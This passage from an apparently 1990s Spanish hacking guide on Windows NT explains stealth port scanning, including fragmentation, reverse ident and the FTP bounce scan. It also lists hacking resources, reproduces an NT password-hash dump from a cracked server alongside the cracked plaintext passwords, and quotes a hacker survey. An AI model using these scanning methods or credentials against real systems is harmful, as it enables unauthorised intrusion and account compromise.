"Stealth Port Scanning". ? Fragmentation scanning: esta no es una nueva tecnica de escaneo como tal, sino una modificacion de las otras. En lugar de mandar sin mas los paquetes de sondeo, los partimos en un par de peque€os fragmentos IP. Asi, estamos consiguiendo partir una cabecera IP en distintos paquetes para hacerlo mas dificil de monitorizar por los filtros de paquetes y por lo tanto mas dificil de averiguar que demonios estas haciendo por parte del sistema objetivo. Pero hay que tener cuidado con esta tecnica. Algunos programas tienen problemas con la gestion de este tipo de paquetes tan peque€os. El sniffer preferido del autor se cuelga con un fallo de segmentacion inmediatamente tras recibir el primer paquete de 36-bytes. Y tras el viene uno de 24 bytes!! Aunque este metodo no pasara los filtros de paquetes y firewalls que encolan todos los fragmentos IP (como la opcion CONFIG_IP_ALWAYS_DEFRAG en Linux), la mayoria de las redes no se pueden permitir la bajada del rendimiento que el hacerlo asi causa al sistema. ? TCP reverse ident scanning: como apunto Dave Goldsmith en 1996 en la lista de distribucion BugTraq, el protocolo ident (RFC 1413) permite descubrir el nombre de usuario del propietario de cualquier proceso conectado via TCP (en UNIX), incluso si dicho proceso no fue el que inicio la conexion. Asi que es posible, por ejemplo, conectarse al puerto http y despues usar el demonio identd para averiguar si el servicio esta ejecutandose con permisos de root. Este tipo de sondeo solo es posible con una conexion TCP completa con el host objetivo (es decir, con la primera forma de escaneo). ? FTP bounce attack: una caracteristica importante del protocolo FTP (RFC 959) es el soporte de conexiones "proxy". En otras palabras, podria ser capaz de conectarme de diablo.com al PI (interprete de protocolos) del servidor FTP de victima.com para establecer el control de la comunicacion de la conexion. Despues podria pedirle al PI del servidor que iniciara un proceso DTP (Data Transfer Protocol) para enviar un fichero a cualquier parte de Internet. Normalmente a un DTP de Usuario, pero la RFC especifica que esta peticion de envio de ficheros puede ser de un servidor a otro servidor. Esta RFC se escribio en 1985 y entonces esta tecnica funcionaba correctamente, pero hoy en dia es menos comun encontrar este tipo de servidores (aunque yo aun no he encontrado uno que no lo permita en Espa€a). Como escribio *Hobbit* en 1995, "esta debilidad en el protocolo puede ser usada para mandar mails y news de forma intraceable, conectarse a servidores de otros sitios, llenar discos, intentar saltarse firewalls y ademas ser muy dificil de trazar y/o detectar." Lo que haremos nosotros sera usar esta debilidad para (sorpresa!) escanear puertos TCP desde un servidor ftp con soporte de conexiones "proxy". Asi podriamos conectarnos a un servidor FTP tras un firewall y despues escanear puertos que en general suelen estar bloqueados (139 es una buena opcion). Si el servidor FTP permite la lectura de y la escritura a un directorio (como /incoming) puedes mandar datos arbitrarios a los puertos que encuentres abiertos. Para el escaneo de puertos, nuestra tecnica es usar el comando PORT para declarar que nuestro "User-DTP" pasivo esta escuchando en la maquina objetivo en un numero de puerto determinado. Despues intentamos realizar un LIST del directorio actual para que se mande el resultado al puerto del servidor especificado via canal DTP. Si la maquina objetivo esta escuchando en el puerto especificado, la transferencia finalizara con un mensaje de exito (generando una respuesta con codigo 150 y otra con codigo 226). En otro caso, recibiremos un mensaje de error "425 Can't build data connection: Connection refused." Posteriormente lanzaremos otro comando PORT para intentar conectarnos al siguiente puerto de nuestro host objetivo. Las ventajas de esta tecnica son obvias (dificil de tracear, con potencial de atravesar firewalls). La principal desventaja es que esta tecnica es lenta, y que algunos servidores FTP se han dado cuenta del problema y han deshabilitado la caracteristica "proxy". 12.4. šQue tecnica usa PARANOIC? Paranoic implementa la primera de las tecnicas presentadas, con la mejora de lanzar varias conexiones (sockets) a la vez, haciendo el escaneo mas eficiente. La idea inicial consistia en que usara el metodo aleatorio y el Stealth Port Scanning, pero mas tarde, me encontre con la desagradable sorpresa de que este metodo no se puede implementar para escanear maquinas con NT. Ademas, este y otros tipos de escaneo que no sean el "TCP connect() scanning", implican programar con Winsocks a bajo nivel, y dado el precario grado de conocimientos de programacion para NT con los que comence este proyecto, no me ha sido posible ir mas alla de lo que en estos momentos hace Paranoic en su modulo de "TCP Port Scanning". Esta es una tarea a mejorar en el futuro. Tambien se estudiara la posiblidad de implementar la tecnica "FTP Bounce Attack" en futuras versiones de Paranoic, pues en Espa€a, los servidores FTP susceptibles a este tipo de ataque aun son numerosos. Apendice A. Bibliografia. [1] CERT: Computer Emergency Response Team http://www.cert.org [2] Saqueadores: la mejor e-zine espa€ola sobre el mundo del hacking. http://www.geocities.com/SiliconValley/8726 [3] NetWizards: (graficas crecimiento de Internet) http://www.nw.com [4] NetCraft: (estadisticas de crecimiento NT vs. otros) http://www.netcraft.com [5] The Havoc Technical Journal: excelente e-zine con temas de hacking, phreaking... http://www.technotronic.com/ezines [6] BugTraq: la lista de distribucion internacional sobre bugs, exploits y debilidades informaticas con mas solera del mundo. Moderada. Suscripcion: Enviar mensaje a listserv@netspace.org, con la siguiente linea en el cuerpo del mensaje: subscribe bugtraq nombre apellido [7] r00tshell: sitio Web dedicado a la seguridad informatica. http://www.rootshell.com Disponen tambien de Advisories periodicos. Suscripcion: Enviar mensaje a majordomo@rootshell.com, con la siguiente linea en el cuerpo del mensaje: subscribe announce [8] Phrack Magazine: una de las revistas electronicas dedicadas a la seguridad informatica de mas solera en los ambientes de hacking. http://www.phrack.com [9] NTBugTraq: excelente lista de distribucion equivalente a BugTraq pero centrada exclusivamente en el sistema operativo Windows NT. Moderada. Suscripcion: Enviar mensaje a listserv@listserv.ntbugtraq.com, con la siguiente linea en el cuerpo del mensaje: subscribe ntbugtraq nombre apellido Web: www.ntbugtraq.com [10] NTSecurity: excelente lista de distribucion que trata sobre temas de seguridad en Windows NT. No moderada. Suscripcion: Enviar mensaje a ntsecurity@iss.net, con la siguiente linea en el cuerpo del mensaje: subscribe ntsecurity Web: www.iss.net (se hace referencia a ella otra vez mas adelante) [11] JJF Hackers: grupo de hackers espa€oles que ya han editado 4 numeros de su revista. http://www.angelfire.com/mi/JJFHackers [12] Security BugWare: una extensa y actualizada coleccion de agujeros de seguridad para todo tipo de sistemas operativos. http://oliver.efri.hr/~crv/security/bugs/new.html [13] AntiOnline: sitio web dedicado a noticias relacionadas con el ambiente hacking. http://www.antionline.com [14] Technotronic: uno de los mejores y mas cuidados sitios relacionados con el hacking. http://www.technotronic.com [15] Rhino9: aqui se encuentran los mejores documentos y herramientas dedicadas a la seguridad en Windows NT. http://207.98.195.250 [16] Microsoft Security: area de seguridad de Microsoft. http://www.eu.microsoft.com/security [17] L0phtcrack: sniffer y crackeador de passwords para Windows NT. http://www.l0phtcrack.com (l-zero-p-h-t) [18] WebTrends:(Pagina web de Asmodeus, escaneador de vulnerabilidades para NT) http://www.asmodeus.com ; http://www.webtrends.com/wss/ [19] ISS: (Internet Security Scanner, uno de los escaneres de vulnerabilidades mas conocidos para Windows NT) http://www.iss.net [20] The Art of Port Scanning: pagina de Fyodor donde se encuentra el original y un excelente programa desarrollado por el mismo, llamado nmap. http://www.dhp.com/~fyodor/nmap/nmap.doc.html [21] "Maxima Seguridad en Internet": Libro. Anaya Multimedia. Anonimo. 1998. [22] "Manual de Seguridad de Windows NT": Libro. McGraw-Hill. Tom Sheldon. [23] "Los Secretos de la Seguridad en Internet": Libro. Anaya Multimedia. John Vacca. [24] Hardening NT: (Buen documento de seguridad para Windows NT) http://www.netcom.com/~honeyluv [25] NT Hacking FAQ: muy buen documento sobre la seguridad en Windows NT. http://www.nmrc.com [26] Tesis presentada por John D. Howard : "An Analysis of Security Incidents on the Internet, 1989 - 1995" en la Carnegie Mellon University. Se puede encontrar en el CERT. [27] "Introduction to Denial of Service". Hans Husman. Disponible en: http://www.student.tdb.uu.se/~t95hhu/secure/DENIAL.txt [28] "Registry Secrets". Articulo de la revista Windows NT Magazine sobre interioridades del registro de Windows NT. http://www.winntmag.com/ns-search/articles/Oct95/REGISTRY.HTM?NS-search- set=\32565\s8l.565b92&NS-doc-offset=3& [29] Unofficial Microsoft Internet Explorer Security FAQ: (Sitio imprescindible sobre el tema de la seguridad en IE, incluyendo el MSIE 4.0.) http://www.nwnetworks.com/iesf.html [30] Hostile Applets Home Page (HAHP): imprescindible pagina relacionada con la seguridad en Java del ilustre Dr. Mark D. LaDue http://www.rstcorp.com/hostile-applets/ [31] Seguridad en JavaScript: http://www.opengroup.org/~loverso/javascript/index.html [32] Netscape Security Problems: http://hplyot.obspm.fr/~dl/netscapesec/ [33] Netscape Security Solutions: http://home.mcom.com/info/security-doc.html [34] TAO of Windows Buffer Overflow: http://www.newhackcity.net/win_buff_overflow/ [35] Fyodor's Exploit World: impresionante BD de exploits para distintos sistemas operativos. A destacar la seccion NT. Incluye comentarios y codigo fuente! http://www.dhp.com/~fyodor/sploits_microshit.html [36] Computer Chaos Club : experto grupo de hackers especializado en la seguridad en ActiveX y grupo Anti-Microsoft. http://www.ccc.de [37] Kriptopolis: excelente pagina de seguridad informatica en castellano. Mucha informacion sobre PGP. http://www.kriptopolis.com [38] NTSecurity.Net: buena pagina sobre seguridad en NT con una BD de vulnerabilidades. http://www.ntsecurity.net [39] Infinidad de recursos sobre seguridad informatica: http://www.alw.nih.gov/Security/security-www.html [40] ENETe: Administracion y seguridad en Windows NT, son los temas en los que se centra este sitio de la Facultad de Informatica de Sevilla: http://acebuche.fie.us.es/enete/ [41] Safe Internet Programming: creadores de uno de los mejores trabajos sobre seguridad en Java e interesados por la seguridad en Internet en general. http://www.cs.princeton.edu/sip Apendice B. El fichero de passwords de prueba. El autor del articulo original sobre crackeo de passwords ( [] The Havoc Technical Journal n§ 13, por WaRsPrItE) edito el siguiente fichero de passwords para protegerse y salvaguardar el anonimato del servidor crackeado (y los usuarios del mismo), sin embargo el fichero es perfectamente valido como ejemplo. Administrator:500:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: Guest:501:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1004:ACAA2B2B4DB1C2F509752A3293831D17:CA45A13FD16012BF33AA68CDFE061FCD:<user name>:: ccrouter:1009:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>:: <user name>:1010:9C0E16584A1066E6C2265B23734E0DAC:3BC5E21044369A593A461ABB6942A8A5:<user name>:: <user name>:1011:D30B776BDA67C893AAD3B435B51404EE:9507A8AD5A9BDFC54E08F713CB74764F:<user name>:: <user name>:1012:1E074F8EF51098B2AAD3B435B51404EE:4F99B255DB7C1852ED01A80576202901:<user name>:: <user name>:1013:904021AAA178696DAAD3B435B51404EE:E8CD0E4A9E89EAB931DC5338FCBEC54A:<user name>:: <user name>:1014:0A5A9AD4C8774E46C2265B23734E0DAC:6ABC3FA6A76801DFFC63BE7565CFD666:<user name>:: <user name>:1015:3F109A599C4324BD93E28745B8BF4BA6:CA162D1F614293BC30686E0AC2F0E67A:<user name>:: <user name>:1016:7CF5973DF34EA1443B80EEA293B236B6:3E5CC1D5EDB4B91334EFEEF1258D3E50:<user name>:: <user name>:1017:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1018:9EF072AE87B5C9C4AAD3B435B51404EE:6FF0D8A475E5C5B0DFD6A8676F18A829:<user name>:: <user name>:1019:6166F0244140F965AAD3B435B51404EE:ECF1BE0786D6E49470107CAB4E3B3E7B:<user name>:: <user name>:1020:BE4C45E3524EF720F500944B53168930:8BB50ADC452C4EE196775B7B5008B341:<user name>:: Supervisor:1026:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>:: FPNW Service Account:1027:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>:: <user name>:1030:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1040:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1041:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1042:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1043:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1044:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1045:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1046:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1047:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1048:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1049:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>:: <user name>:1051:0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52:<user name>:: test:1061:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>:: <user name>:1062:6B35A2BA7D7C5B3AAAD3B435B51404EE:3A1B4CFCEB4385D1108253A357B2955E:<user name>:: FILE-SERVER$:1066:79570B2F6875312AA1455905822538D8:D114D50DD21D6ADDEBB008E3231D7A44::: NT$:1067:07128FE8EEB666E788371ED292FDCCE7:AF7C003BB0917BC28E37F1785E2B9018::: <user name>:1068:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>:: IUSR_FILE-SERVER:1069:338C0358DECFDA2902386B2E93EFFD10:9393E296495FDC72CCF951D249BB921F:<user name>:: PLUTONIUM$:1070:C31C1D58633BE3ED27892589E3A13688:26BC63583A0EB0DB6E7C6DCA33F3AB00::: Apendice C. Los resultados del crackeo de passwords. User: [<user name>] Lanman PW: [LOBOS1] NT dialect PW: [lobos1] User: [<user name>] Lanman PW: [MANDAR] NT dialect PW: [mandar] User: [<user name>] Lanman PW: [SKIING] NT dialect PW: [skiing] Apendice D. Perfil de 100 conocidos hackers. AntiOnline's Special Reports On CyberCulture Encuesta de 100 conocidos hackers Hemos hecho algo que solo AntiOnline podia hacer. Realizar encuestas a 100 conocidos hackers y servirnos de ellos para elaborar el siguiente perfil. Estas encuestas fueron realizadas via irc, email, grupos de news e incluso por telefono. Para garantizar la confidencialidad de los entrevistados no daremos los datos individuales asi que no os molesteis en preguntar por ellos. Por supuesto esto no es una encuesta "cientifica" pero hemos hecho lo mejor que hemos podido para obtener datos de los personajes representativos entre la comunidad hacker. Que edad tienes? Media: 17 Menor: 9 Mayor: 42 Hombre o mujer? Hombre: 93% Mujer: 4% No Sabe/No contesta: 3% Vives en los USA? Si: 76% No: 23% No sabe/No contesta: 1% Vas o planeas ir a la Universidad? Si: 72% No: 21% No sabe/No contesta: 7% Cuantas horas a la semana dedicas a los ordenadores? (Sin contar trabajo) Media : 57 Menor : 16 Mayor: 120 Has penetrado ilegalmente en algun sistema? Si: 81% No: 9% No sabe/No contesta: 10% Has entrado alguna vez en un servidor gubernamental o militar? Si: 68% No: 12% No sabe/No contesta: 20% Crees que te pillaran hackeando? Si: 3% No: 95% No sabe/No contesta: 2% Perteneces a un grupo de hack? Si: 58% No: 37% No sabe/No contesta: 5% Hacking NT v1.0